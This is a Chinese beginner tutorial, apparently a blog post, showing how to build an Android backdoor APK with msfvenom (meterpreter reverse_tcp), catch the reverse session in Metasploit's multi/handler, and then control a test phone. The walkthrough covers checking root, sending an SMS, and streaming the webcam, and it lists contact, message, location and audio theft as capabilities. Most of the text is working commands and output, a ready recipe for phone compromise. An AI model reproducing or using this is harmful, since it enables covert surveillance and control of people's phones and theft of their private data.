Kali之Metasploit生成apk后门控制安卓

扫盲教程，大佬勿喷。

实验中请更改为你环境的IP。

生成apk后门

Kali Linux（Hack）：192.168.169.76

Android（靶机）：192.168.169.137

启动kali，开终端，生成apk后门。仅有9.2k的apk，也是蛮吊

 

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9486 bytes

　　

lhost为kali的ip，lport指定一个端口。

开metasploit控制台侦听

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp #设置payload
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.169.76 #kali的IP
lhost => 192.168.169.76
msf exploit(handler) > set lport 445 #对应刚才设的端口
lport => 445
msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.169.76:445
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.169.137
[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400

　　

复制apk出来装到手机上打开后就可以exploit了，会看到会话反弹回来。

可以看下帮助都有啥操作

meterpreter > help

功能示例

读取联系人，信息，拍照，录音，获取位置信息，上传下载文件等等，还是挺强大的。

 

#系统信息
meterpreter > sysinfo 
Computer    : localhost
OS          : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64)
Meterpreter : java/android

#查看root状态
meterpreter > check_root 
[+] Device is rooted

#发送短信
meterpreter > send_sms 
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."

OPTIONS:

    -d  <opt>  Destination number
    -dr        Wait for delivery report
    -h         Help Banner
    -t  <opt>  SMS body text


meterpreter > send_sms -d +8610086 -t "我是你爸爸"
[+] SMS sent - Transmission successful
meterpreter >

#网页视频聊天（我手机没合适浏览器没打开）
meterpreter > webcam_chat 
[*] Webcam chat session initialized.
[-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine


#网页摄像头视频流，显示实时画面
meterpreter > webcam_stream 
[*] Starting...
[*] Preparing player...
[*] Opening player at: lwqAtUFm.html
[*] Streaming...

 

补充freebuf上的文章：

如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓